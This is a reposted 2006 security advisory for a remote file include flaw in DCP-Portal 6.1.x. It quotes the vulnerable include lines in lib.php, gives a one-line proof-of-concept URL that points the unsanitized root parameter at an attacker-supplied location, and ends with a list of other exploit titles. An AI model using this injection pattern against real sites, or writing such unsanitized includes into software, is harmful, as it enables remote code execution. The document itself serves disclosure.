exploits , vulnerabilities , articles , DCP-Portal 6.1.x (root) Remote File Include Vulnerability

2006-06-12

DCP-Portal 6.1.x (root) Remote File Include Vulnerability

Rated as : High Risk

-----------------------------------------------------
Advisory id: FSA:013

Author:    Federico Fazzi
Date:      12/06/2006, 9:31
Sinthesis: DCP-Portal 6.1.x, Remote command execution
Type:      high
Product:   http://www.dcp-portal.org/
Patch:     unavailable
-----------------------------------------------------


1) Description:

Error occured in lib.php, line 4/7:

include ("$root/library/lib_nav.php");
include ("$root/library/lib_mods.php");
include ("$root/library/lib_admin.php");
include ("$root/library/lib_3rd.php");

variable $root not sanitized (declare).

2) Proof of concept:

http://example/[dp_path]/library/lib.php?root=[cmd_url]

3) Solution:

declare $root variable on this file.
securitydot.net - 2006-06-12

Exploits - newest 10 RSS | More

2007-06-15 57359 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34261 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42500 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29380 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19806 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16744 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19449 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16632 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33655 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17265 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit